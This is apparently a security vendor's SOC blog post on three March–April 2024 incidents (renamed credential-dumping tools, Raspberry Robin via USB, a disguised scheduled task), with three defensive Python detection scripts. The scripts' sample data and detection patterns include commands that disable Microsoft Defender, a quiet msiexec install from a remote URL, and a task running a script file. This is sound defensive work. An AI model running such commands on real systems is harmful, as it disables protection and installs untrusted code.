Between March 27 and April 3, 2024, Blackpoint’s Security Operations Center (SOC) responded to 156 total incidents. These incidents included 9 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 145 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:
- Mimikatz, LaZagne, and CredentialsFileView all running under the name of legitimate security tool “Automim,”
- Raspberry Robin malware deployed via USB drive for initial access, and
- Malicious JavaScript file via a scheduled task for execution, persistence, and command and control (C2) communication using PowerShell.
In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if you’ve not been attacked yet! – as well as possible mitigations by leveraging your current tech stack and Blackpoint’s Active Cybersecurity.
Mimikatz, LaZagne, CredentialsFileView Incident with Legal Services End Client on March 31, 2024
Topline Takeaways
- Industry target: Legal Services
- Attacker information:
- Mimikatz abuse
- LaZagne abuse
- CredentialsFileView abuse
- Impacted partner systems:
- Microsoft Windows Defender
- Threat assessment for partners:
- The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to abuse Mimikatz, LaZagne, and CredentialsFileView to exploit other legal services organizations over the next 12 months.
- Recommended remediations and mitigations:
- Least-privilege access controls
- Heuristics-based activity monitoring and remediation
- Multifactor authentication (MFA)
Mimikatz, LaZagne, and CredentialsFileView Incident Timeline for March 31, 2024
- 12:26 a.m. ET: Blackpoint’s MDR alerted to malicious tools running on a legal services end client’s machine.
- 12:26 a.m. ET: An MDR analyst began initial triage and investigation, as the observed “user” was also running multiple commands to disable Microsoft Defender before executing malicious tools.
- 12:27 a.m. ET: The analyst escalated the incident to senior SOC leadership for further investigation, during which the malicious tools were identified as Mimikatz, LaZagne, and CredentialsFileView running under “Automim” – a known security tool used to simulate attacks.
- 12:28 a.m. ET: The senior MDR analyst isolated the impacted endpoint from all external and internal communications.
- 12:32 a.m. ET: The SOC made contact with the end client’s MSP about the incident, providing additional remediation advice.
More About Mimikatz, LaZagne, and CredentialsFileView
Mimikatz
Mimikatz (1) is an open source application that allows users to view and save authentication credentials, including Kerberos tickets.
Mimikatz is a legitimate credential harvester used by system administrators and penetration testers for Windows operating systems (OSs). An attacker can abuse Mimikatz to execute multiple credential gathering techniques, including:
- Pass-the-hash attacks
- Pass-the-ticket attacks
- Pass-the-key attacks
- Kerberoasting
- Pass-the-cache attacks
LaZagne
LaZagne (2) is an open source credentials recovery tool that can be used to extract passwords from various software and OSs – including Windows, Linux, and macOS. The project supports:
- Internet browsers,
- Messaging applications,
- Databases,
- Games,
- Email software, and other media formats.
The tool is written in Python and is customizable – which makes it a flexible tool capable of targeting the latest applications and platforms. In a threat actor’s hands, LaZagne is capable of multiple credential gathering/access techniques, including:
- Brute force attacks
- Dictionary attacks
- Keychain extraction
Additionally, the tool extracts passwords stored locally, providing a decrypted list for the user – or in this case, the attacker masquerading as a user.
CredentialsFileView
CredentialsFileView (3) is an attacker tool that targets Windows OSs to decrypt and display passwords and other data stored in system credential files, as well as data stored on external drives.
Unlike Mimikatz and LaZagne, CredentialsFileView does not require installation processes or dynamic link libraries (DLL); the user only needs to run the executable “CredentialsFileView.exe.”
APG Threat Analysis of Mimikatz, LaZagne, and CredentialsFileView Abuse for 2024
The APG predicts that threat actors will likely continue to abuse all three software tools – Mimikatz, LaZagne, and CredentialsFileView – over the next 12 months.
We base this assessment on observed threat actor activity abusing legitimate tools for a technique known as “living off the land” (LotL) (4).
All three listed tools – especially Mimikatz – are legitimate software and system tools that threat actors have co-opted for unauthorized credential access.
In fact, the APG is actively tracking legitimate tool abuse by threat actors in publicly known attacks, particularly:
- Mimikatz, with 18 ransomware groups and 43 threat groups (5); and
- LaZagne, with 6 ransomware groups and 10 threat groups (6).
As for CredentialsFileView abuse, Dharma ransomware operators were observed in 2020 using CredentialsFileView for credential access during a ransomware attack (7). The observed behavior matched how the would-be attackers were leveraging CredentialsFileView against Blackpoint’s partner, though our SOC isolated the impacted devices well before any sort of lateral movement or compromise occurred.
Recommended Mimikatz, LaZagne, and CredentialsFileView Abuse Mitigations and Remediations
Blackpoint APG recommends the following actions to help mitigate the abuse of legitimate credential harvesting tools by threat actors:
- Implement least-privilege access controls. These controls limit access to organizational files, data, applications, and capabilities to only the users who need them for their jobs within the organization.
- These access controls help ensure that even if a single endpoint or user profile is compromised through abused credential harvesting tools like the ones used in this incident, the threat actor’s capabilities are limited to only the compromised credential’s permissions.
- Heuristics-based activity monitoring and remediation that activates based on unusual or potentially malicious user or endpoint activity, rather than relying on static indicators of compromise (IoCs) alone.
- When threat actors abuse legitimate tools, traditional firewalls or EDRs may not alert to the threat actor’s presence within a given endpoint or system. However, by triggering alerts based on malicious activity – no matter which tool they choose to use or abuse! – threat actors can be caught more quickly and before a material breach occurs.
- Ensure employees are using MFA while on organization applications or databases, but especially when they must access sensitive data and resources.
- While the credential harvesting tools used in this incident may decrypt user secrets and credentials, they cannot uncover every form of authentication used as part of MFA access control configurations. A would-be compromised user will receive an identity-confirmation prompt they did not request – alerting them that their credentials are compromised – or the attacker will be stopped entirely if they cannot trick or spoof the other forms of authentication required for access.
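The heuristics-based monitoring recommended above can be illustrated with the exact chain this incident showed: Defender-tampering commands followed, on the same host, by credential-access tools running under a renamed binary. The following is an added example written for this post, not Blackpoint's code or any product's detection logic. Its event records are constructed and use the fields a process-creation telemetry source such as Sysmon event ID 1 provides (image path, the PE header's OriginalFileName, command line); the field names, host names, paths, tamper patterns, and the 10-minute window are assumptions for the example.

```python
"""Heuristic correlation: Microsoft Defender tampering commands followed, on the same
host, by a credential-access tool running under a renamed binary.

Added example; not Blackpoint's code. Event records are constructed and mimic the fields
of a process-creation telemetry source (e.g. Sysmon event ID 1). Field names, hosts,
paths, patterns and the window are assumptions for the example."""
from datetime import datetime, timedelta
import re

# Command-line fragments that disable or weaken Defender. Constructed starter list.
TAMPER_PATTERNS = [
    re.compile(r"Set-MpPreference\s+-Disable\w*Monitoring\s+\$true", re.I),
    re.compile(r"Set-MpPreference\s+-DisableIOAVProtection\s+\$true", re.I),
    re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    re.compile(r"\bsc(?:\.exe)?\s+(?:stop|config)\s+WinDefend\b", re.I),
]

# PE OriginalFileName values of the three tools. A renamed copy ("Automim.exe") keeps
# this header field, so match on it instead of the on-disk file name.
CREDENTIAL_TOOLS = {"mimikatz.exe", "lazagne.exe", "credentialsfileview.exe"}
WINDOW = timedelta(minutes=10)  # assumed correlation window

def _basename(path):
    return path.replace("/", "\\").split("\\")[-1].lower()

def is_tamper(command_line):
    return any(p.search(command_line) for p in TAMPER_PATTERNS)

def is_credential_tool(event):
    return event["original_file_name"].lower() in CREDENTIAL_TOOLS

def renamed_credential_tools(events):
    """Credential tools whose on-disk name differs from their PE OriginalFileName."""
    return [e for e in events
            if is_credential_tool(e) and _basename(e["image"]) != e["original_file_name"].lower()]

def correlate(events):
    """For each credential-tool execution, report it together with any Defender
    tampering commands seen on the same host within WINDOW beforehand."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for i, ev in enumerate(events):
        if not is_credential_tool(ev):
            continue
        tamper = [p["command_line"] for p in events[:i]
                  if p["host"] == ev["host"]
                  and ev["ts"] - p["ts"] <= WINDOW
                  and is_tamper(p["command_line"])]
        if tamper:
            alerts.append({
                "host": ev["host"], "user": ev["user"], "ts": ev["ts"],
                "tool": ev["original_file_name"], "image": ev["image"],
                "renamed": _basename(ev["image"]) != ev["original_file_name"].lower(),
                "preceding_tamper": tamper,
            })
    return alerts

def _ev(minute, host, user, image, original, cmd):  # builds one constructed event record
    return {"ts": datetime(2024, 3, 31, 0, minute), "host": host, "user": user,
            "image": image, "original_file_name": original, "command_line": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample data; not telemetry from the incident
    _ev(20, "LEGAL-WS01", "jdoe", PS, "PowerShell.EXE",
        "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"),
    _ev(21, "LEGAL-WS01", "jdoe", PS, "PowerShell.EXE",
        r'powershell.exe Add-MpPreference -ExclusionPath "C:\Users\jdoe\tools"'),
    _ev(26, "LEGAL-WS01", "jdoe", r"C:\Users\jdoe\tools\Automim.exe", "mimikatz.exe",
        r"C:\Users\jdoe\tools\Automim.exe"),
    _ev(26, "LEGAL-WS01", "jdoe", r"C:\Users\jdoe\tools\Automim.exe", "LaZagne.exe",
        r"C:\Users\jdoe\tools\Automim.exe all"),
    _ev(27, "HR-WS04", "asmith", r"C:\Windows\System32\notepad.exe", "NOTEPAD.EXE",
        "notepad.exe"),
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a['host']} {a['ts']:%H:%M} {a['tool']} via {a['image']} "
              f"(renamed={a['renamed']}) after {len(a['preceding_tamper'])} tamper command(s)")
```

The point of the two functions is the one the mitigation makes: neither depends on the file name "Automim.exe". The rename check compares the on-disk name with the PE header's original name, and the correlation fires on the sequence of behaviours (tamper, then credential access) regardless of which tool the attacker chose.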
Raspberry Robin Incident with Basic Materials End Client on March 31, 2024
Topline Takeaways
- Industry target: Basic Materials
- Attacker information:
- Raspberry Robin
- USB drive
- Impacted partner systems:
- Microsoft Defender for Endpoint
- Threat assessment for partners:
- The APG predicts that it is very likely that threat actors will continue to use Raspberry Robin to exploit other basic materials organizations over the next 12 months.
- Recommended remediations and mitigations:
- Environment segmentation
- Employee security training
- Controls preventing unauthorized use of legitimate tools and/or allowlisted applications
Raspberry Robin Malware Incident Timeline for March 31, 2024
- 11:55 a.m. ET: Blackpoint’s MDR alerted to a suspicious USB drive on the host of a basic materials partner.
- 11:58 a.m. ET: An MDR analyst began initial triage and investigation, during which the suspicious USB drive issued commands to the command prompt of the now-infected machine.
- 11:59 a.m. ET: The analyst escalated the incident to senior SOC leadership for further investigation of the commands, which indicated Raspberry Robin malware.
- 11:59 a.m. ET: The senior MDR analyst isolated the impacted endpoint from all external and internal communications.
- 12 p.m. ET: The SOC made contact with the basic materials end client’s MSP about the incident, and offered additional remediation advice.
More About Raspberry Robin Malware
Raspberry Robin is worm malware, first identified in 2021 (8), that spreads itself through a network, most often via infected USB drives.
The group behind the Raspberry Robin worm acts as an initial access broker (IAB) to other malware and threat groups, using their worm feature for lateral movement from the initial intrusion to other endpoints prior to deploying additional malicious payloads.
Researchers previously observed Raspberry Robin gaining persistence on a network by adding itself to the RunOnce key in the CurrentUser registry hive of the user who executed the malware, as well as the use of msiexec.exe to install a malicious DLL file. (8)
APG Threat Analysis of Raspberry Robin Malware for 2024
The APG predicts that threat actors will very likely continue to use Raspberry Robin over the next 12 months.
We base this assessment in part on the observed popularity of Raspberry Robin as a lateral movement and persistence tool of choice among threat actors.
In August 2023, for example, researchers found Raspberry Robin as the third most popular loader malware observed in the first half of 2023, accounting for 23% of observed incidents (9).
Raspberry Robin malware is also flexible in its ransomware variant deployments – including also-popular CL0P and LockBit – and other malware – including TrueBot and FlawedGrace.
Finally, in February 2024, the Raspberry Robin malware was reportedly updated with a new delivery method (10), now disguising itself as a legitimate Windows component and exploiting newly disclosed “one day” vulnerabilities (as opposed to “zero-day” vulnerabilities) to gain access to victim environments.
Recommended Raspberry Robin Mitigations and Remediations
The APG recommends the following actions to help mitigate Raspberry Robin malware.
- Conduct employee security awareness training to ensure employees are aware of the risks of rogue USB devices.
- The initial intrusion vector for this partner’s Raspberry Robin incident was an infected removable memory device. While the context behind why the user chose to plug this device into their monitored endpoint is unknown, additional training could have helped the user think twice before using unofficial removable media in their organization-assigned laptop or PC.
- Segment critical systems, so they are isolated from less secure areas while preventing unauthorized communication between segments.
- By separating your organization’s environment to specific groups of endpoints, applications, and users, threat actors using malware such as Raspberry Robin will find themselves unable to spread laterally to more desirable areas of a victim’s environment – and with fewer ways to persist within the infected environment once discovered.
- Employ access controls that restrict end users’ removable memory access, to reduce the opportunity for malicious USB drives or other media to execute their payloads.
- If the user’s environment had had controls in place that prevented the reading of removable memory devices like USB drives, then the Raspberry Robin malware could never have deployed at all!
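Beyond blocking removable media, defenders can check for the persistence artifacts the research cited above attributes to Raspberry Robin (a RunOnce value in the current user's hive, and msiexec.exe installing a package) and for autostart commands that point back to a removable drive. The following is an added example written for this post, not Blackpoint's code or any vendor's rule. The registry entries are constructed; a live audit would enumerate the Run and RunOnce keys with winreg or from a collected hive, and the removable drive letters and the alert threshold are assumptions.

```python
"""Audit of Run/RunOnce autostart values for msiexec-based remote installs, removable
drive launch paths, script/proxy-execution hosts and per-user RunOnce placement.

Added example; not Blackpoint's code. Registry entries are constructed; the removable
drive letters and the threshold are assumptions for the example."""
import re

# Drive letters the audited host reports as removable volumes (assumed for the example).
REMOVABLE_DRIVES = {"D:", "E:"}
MSIEXEC_REMOTE = re.compile(r'msiexec(?:\.exe)?\b.*?/i\s+"?(https?://\S+?)"?(?:\s|$)', re.I)
MSIEXEC_QUIET = re.compile(r"msiexec(?:\.exe)?\b.*?/q(?:n|b)?\b", re.I)
DRIVE_REF = re.compile(r"(?<![A-Za-z0-9])([A-Za-z]):\\")
LOLBIN_HOST = re.compile(r"\b(?:wscript|cscript|mshta|rundll32|regsvr32)(?:\.exe)?\b", re.I)

def assess_autostart(key_path, value_name, command):
    """Score one autostart value; each matched trait adds one reason."""
    reasons = []
    m = MSIEXEC_REMOTE.search(command)
    if m:
        reasons.append(f"msiexec installs a package from a remote URL ({m.group(1)})")
    if MSIEXEC_QUIET.search(command):
        reasons.append("msiexec runs with a quiet/no-UI flag")
    for letter in DRIVE_REF.findall(command):
        if f"{letter.upper()}:" in REMOVABLE_DRIVES:
            reasons.append(f"command references removable drive {letter.upper()}:")
            break
    if LOLBIN_HOST.search(command):
        reasons.append("script host or proxy-execution binary in autostart value")
    if key_path.upper().startswith("HKCU") and key_path.upper().endswith("\\RUNONCE"):
        reasons.append("per-user RunOnce value (deleted after it runs once)")
    return {"key": key_path, "name": value_name, "command": command,
            "score": len(reasons), "reasons": reasons}

def audit(entries, threshold=2):
    """Entries whose score reaches the threshold; a lone RunOnce value does not alert."""
    results = [assess_autostart(*e) for e in entries]
    return [r for r in results if r["score"] >= threshold]

SAMPLE_ENTRIES = [  # constructed (key path, value name, command); not data from the incident
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Update",
     r'msiexec.exe /q /i "http://example.invalid/pkg/update.msi"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Setup",
     r"cmd.exe /c start E:\setup\install.cmd"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for r in audit(SAMPLE_ENTRIES):
        print(f"[{r['score']}] {r['key']}\\{r['name']}: {r['command']}")
        for reason in r["reasons"]:
            print("   -", reason)
```

A per-user RunOnce value on its own is common for legitimate installers, which is why it only counts as one reason and the threshold is two: the entry has to combine RunOnce placement with a remote package, a quiet install, a removable-drive path, or a script host before it surfaces.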
Scheduled Task Abuse Incident with Healthcare End Client on April 2, 2024
Topline Takeaways
- Industry target: Healthcare
- Attacker information:
- Scheduled task “Firefox as the Default Browser Agent”
- “Chase_Bank_Statement_March[.]zip”
- Impacted partner systems:
- PowerShell
- Threat assessment for partners:
- The APG predicts that it is almost certain that threat actors will continue to use Scheduled Task Abuse to exploit other healthcare organizations over the next 12 months.
- Recommended remediations and mitigations:
- Improve endpoint, asset, and network visibility
- Use a content proxy
- Scripting language controls
Scheduled Task “Firefox as the Default Browser Agent” Incident Timeline for April 2, 2024
- 3:32 p.m. ET: Blackpoint’s MDR alerted to a process violation of a JavaScript file via wscript.exe through a Scheduled Task, taking place on a healthcare end client’s endpoint.
- 4:38 p.m. ET: An MDR analyst began initial triage and investigation, as the endpoint’s Scheduled Tasks executed a new task called “FireFox as the Default Browser Agent” to run malicious files while the attacker abused the infected endpoint’s PowerShell feature to connect with a C2 server with a Dutch IP address.
- 4:39 p.m. ET: The analyst isolated the impacted endpoint from all external and internal communications.
- 4:50 p.m. ET: The SOC made contact with the healthcare end client’s MSP about the incident, and offered additional remediation advice.
More About Scheduled Task Abuse
The Scheduled Tasks function on Microsoft endpoints allows users – often developers and system administrators – to automatically perform routine tasks on a chosen device (11).
The Task Scheduler application in Windows OS allows the user to choose when a task is executed. These automation triggers can include a specific time, when an action occurs, or when a user logs in.
Scheduled tasks are not frequently used by most users of Microsoft Windows OS, as it requires a user to access their machine’s control panel and administrative tools to schedule and run the needed script and functionality.
Many organizations managing Windows OS endpoints will keep the Task Scheduler available to end users – even when they don’t know or use the functionality! – for the convenience of their more technical users and system admins.
However, threat actors are more technical than the average Windows user, and are more than capable of both accessing and running malicious tasks through a compromised endpoint’s Task Scheduler without a user knowing something is wrong.
APG Threat Analysis of Scheduled Task Abuse for 2024
The APG predicts that threat actors will almost certainly continue to abuse scheduled tasks over the next 12 months.
We base this assessment on the sheer volume of recorded and observed incidents – both within Blackpoint partner environments and in other researchers’ findings – in which scheduled tasks were used by threat actors of all kinds, including advanced persistent threat (APT) and cybercriminal groups.
Threat actors seem to run scheduled tasks specifically to establish persistence on a compromised endpoint. Task Scheduler allows threat actors to automatically run malware in a way that blends into the environment, since many legitimate and allowlisted Windows applications also use scheduled tasks for automated deployments.
In 2022, for example, Microsoft security researchers observed the threat group HAFNIUM (also known as “Silk Typhoon” and “Red Dev 13”) using the Tarrask malware to create and remove “hidden” scheduled tasks for defense evasion during cyberattacks (12).
Threat actors will even go so far as to name their scheduled tasks the names of common, allowlisted applications or processes – “Firefox”, for this specific incident – in order to blend in with normal endpoint activities and further evade detection.
In last week’s SOC incident analysis, the SOC thwarted a Gootloader malware incident, during which MDR analysts observed the use of a similar malicious attachment name (“chase_statement_Jan_2024[.]zip”) and a similar scheduled task name (“Firefox Default Browser Agent”) to this week’s incident.
While this week’s specific incident is not confirmed to be a prelude to a Gootloader installation, the APG believes it is likely that these scheduled tasks and malicious attachment names are related to last week’s Gootloader incident, at the very least.
Recommended Scheduled Task Abuse Mitigations and Remediations
The APG recommends the following actions to help mitigate malicious use of scheduled tasks on Windows OS devices and systems.
- Improve endpoint, asset, and overall environment visibility to monitor remote systems and endpoints.
- Active monitoring of on-device management clients can aid in detecting and isolating malicious activity conducted by Gootloader and other malware on managed endpoints.
- Implement behavioral monitoring to detect unusual patterns that could indicate malicious behavior by threat actors.
- As we’ve covered previously, threat actors abuse allowlisted applications and processes to spread malware and evade detection by more traditional security tools operating primarily from known IoCs. Heuristics-based alerting allows security teams to detect even brand-new malware or abuses… even if it’s a slightly different file name than has been previously seen, as our SOC analysts alerted to the new malicious file that was almost-but-not-quite a copy of last week’s.
- Eliminate scripting language use within your managed environment – or at the very least, implement very strong controls on its use!
- Most end users have no reason to access scripting applications such as Task Scheduler, or to run JavaScript files on their endpoints. Cut off one of an attacker’s main persistence tools by severely limiting your end users’ access to these tools!
- Use a content proxy to monitor internet use and restrict user access to suspicious or risky websites.
- The malicious files seen in these incidents appear on the surface to be safe, particularly with known-good sources such as “Chase” or “Firefox Default” in the file name. The average end user – or even a rushed IT professional! – might authorize a malware script to load and deploy, thinking it’s okay. However, content proxies can help mitigate this simple human error, as they examine the source and location of the file – not the easily changed file name – to determine whether the file truly is legitimate… or another Gootloader malware in disguise.
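The visibility and scripting-control recommendations above come together in a task audit: Windows stores every scheduled task as an XML file under the System32\Tasks folder, and that file exposes the action (command and arguments) behind whatever friendly name the task carries. The following is an added example written for this post, not Blackpoint's code or a Microsoft tool. The two task definitions are constructed (trimmed to the elements the audit reads), and KNOWN_GOOD is an assumed table an analyst would populate from a clean reference host; the executable name it lists for the genuine Mozilla task is part of that assumption.

```python
r"""Audit of scheduled-task XML definitions for script-host actions, script-file
arguments, user-writable payload paths, and task names that imitate a vendor's task
while running a different executable.

Added example; not Blackpoint's code. The task definitions are constructed and
KNOWN_GOOD is an assumed table to be filled in from a clean reference host."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(?:js|jse|vbs|vbe|wsf|hta|ps1)\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users|ProgramData|Temp)\\", re.I)
# Assumed known-good table: name keywords -> executable the genuine task runs.
KNOWN_GOOD = {("firefox", "browser agent"): "default-browser-agent.exe"}

def _basename(path):
    return path.strip('"').replace("/", "\\").split("\\")[-1].lower()

def analyze_task(xml_text):
    """Parse one task definition and return its name, action and a list of findings."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    name = uri.rsplit("\\", 1)[-1]
    exec_el = root.find("t:Actions/t:Exec", NS)
    command = exec_el.findtext("t:Command", default="", namespaces=NS) if exec_el is not None else ""
    args = exec_el.findtext("t:Arguments", default="", namespaces=NS) if exec_el is not None else ""
    findings = []
    if _basename(command) in SCRIPT_HOSTS:
        findings.append(f"action runs script host {_basename(command)}")
    if SCRIPT_FILE.search(args):
        findings.append("a script file is passed as the action argument")
    if USER_WRITABLE.search(command + " " + args):
        findings.append("payload lives in a user-writable location")
    # Compare the task name against vendor tasks it may be imitating.
    normalized = re.sub(r"\s+", " ", re.sub(r"[^a-z ]", "", name.lower()))
    for keywords, expected_exe in KNOWN_GOOD.items():
        if all(k in normalized for k in keywords) and _basename(command) != expected_exe:
            findings.append(f"name imitates a vendor task but the action is not {expected_exe}")
    return {"name": name, "command": command, "arguments": args, "findings": findings}

def audit_tasks(xml_texts):
    """Analyses of the tasks that produced at least one finding."""
    return [r for r in map(analyze_task, xml_texts) if r["findings"]]

# Constructed task definitions; not the files from the incident.
MALICIOUS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>HC-WS07\jdoe</Author><URI>\FireFox as the Default Browser Agent</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>wscript.exe</Command>
    <Arguments>"C:\Users\jdoe\AppData\Roaming\Chase_Bank_Statement_March.js"</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Mozilla</Author><URI>\Mozilla\Firefox Default Browser Agent 1A2B3C</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Mozilla Firefox\default-browser-agent.exe</Command>
    <Arguments>do-task</Arguments>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for r in audit_tasks([MALICIOUS_TASK, BENIGN_TASK]):
        print(f"{r['name']}: {r['command']} {r['arguments']}")
        for f in r["findings"]:
            print("   -", f)
```

The name comparison deliberately ignores case, punctuation and extra words, so “FireFox as the Default Browser Agent” and “Firefox Default Browser Agent” both map to the same vendor entry; what separates them is the action, which is why the audit reads the Exec element rather than trusting the name.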
Further Information and Resources
- (1) GitHub repository: “mimikatz” by gentilkiwi, 2024-01-05
- (2) GitHub repository: “LaZagne” by Alessandro, 2023-11-13
- (3) NirSoft: “CredentialsFileView v1.12” by NirSoft, 2023
- (4) MSSP Alert: “Right of Boom: Day 2, Live Blog” by Jessica C. Davis, 2024-03-08
- (5) MITRE ATT&CK: “Mimikatz” by MITRE, 2023-07-27
- (6) MITRE ATT&CK: “LaZagne” by MITRE, 2023-08-03
- (7) CrowdStrike blog: “Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques” by Eric Loui, Karl Scheuerman, Aaron Pickett, and Brendon Feeley, 2020-04-16
- (8) Red Canary blog: “Raspberry Robin” by Red Canary, 2024-03-12
- (9) ReliaQuest blog: “3 Malware Loaders You Can’t (Shouldn’t) Ignore” by ReliaQuest Threat Research Team, 2023-08-25
- (10) Check Point Research blog: “Raspberry Robin Keeps Riding the Wave of Endless 1-Days” by Check Point Research, 2024-02-07
- (11) Microsoft documentation: “Task Scheduler for developers” by Microsoft, 2023-02-08
- (12) Microsoft Security blog: “Tarrask malware uses scheduled tasks for defense evasion” by Microsoft Incident Response and Microsoft Threat Intelligence, 2022-04-12